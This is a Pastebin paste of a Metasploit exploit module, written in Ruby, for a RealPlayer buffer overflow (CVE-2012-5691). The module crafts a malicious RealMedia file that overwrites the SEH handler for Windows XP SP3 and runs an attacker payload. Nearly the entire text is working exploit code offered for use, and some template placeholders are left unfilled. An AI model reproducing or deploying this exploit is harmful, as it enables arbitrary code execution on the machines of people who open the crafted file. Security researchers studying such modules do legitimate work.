Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ##
- # This file is part of the Metasploit Framework and may be subject to
- # redistribution and commercial restrictions. Please see the Metasploit
- # Framework web site for more information on licensing and terms of use.
- # http://metasploit.com/framework/
- ##
- require 'msf/core'
- class Metasploit3 < Msf::Exploit::Remote
- #Rank definition: http://dev.metasploit.com/redmine/projects/framework/wiki/Exploit_Ranking
- #ManualRanking/LowRanking/AverageRanking/NormalRanking/GoodRanking/GreatRanking/ExcellentRanking
- Rank = NormalRanking
- include Msf::Exploit::FILEFORMAT
- include Msf::Exploit::Seh
- def initialize(info = {})
- super(update_info(info,
- 'Name' => 'RealPlayer BoF 0Day',
- 'Description' => %q{
- Buffer overflow with RealMedia files vulnerability
- Affected software: Windows RealPlayer 15.0.6.14 and prior.
- },
- 'License' => MSF_LICENSE,
- 'Author' =>
- [
- 'suto(https://twitter.com/toanphamvan) ', # Original discovery
- 'trongnguyen0205@gmail.com', # MSF Module
- ],
- 'References' =>
- [
- [ 'OSVDB', '<insert OSVDB number here>' ],
- [ 'CVE', 'CVE-2012-5691' ],
- [ 'URL', 'http://service.real.com/realplayer/security/12142012_player/en/' ]
- ],
- 'DefaultOptions' =>
- {
- 'ExitFunction' => 'process', #none/process/thread/seh
- #'InitialAutoRunScript' => 'migrate -f',
- },
- 'Platform' => 'win',
- 'Payload' =>
- {
- 'BadChars' => "\x0d", # <change if needed>
- 'DisableNops' => true,
- },
- 'Targets' =>
- [
- [ 'Windows XP SP3',
- {
- 'Ret' => 0x5acd5121 ,
- 'Offset' => 2312
- }
- ], # pop ebx # pop esi # ret - rpap3260.dll
- ],
- 'Privileged' => false,
- #Correct Date Format: "M D Y"
- #Month format: Jan,Feb,Mar,Apr,May,Jun,Jul,Aug,Sep,Oct,Nov,Dec
- 'DisclosureDate' => 'MONTH DAY YEAR',
- 'DefaultTarget' => 0))
- register_options([OptString.new('FILENAME', [ false, 'The file name.', 'msf.rm']),], self.class)
- end
- def exploit
- content = "[InternetShortcut]\nURL="
- buffer = "A"*2312
- buffer << generate_seh_record(target.ret)
- buffer << make_nops(30)
- buffer << payload.encoded #522 bytes of space
- filecontent = content+buffer+"B"*5000
- file_create(filecontent)
- end
- end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement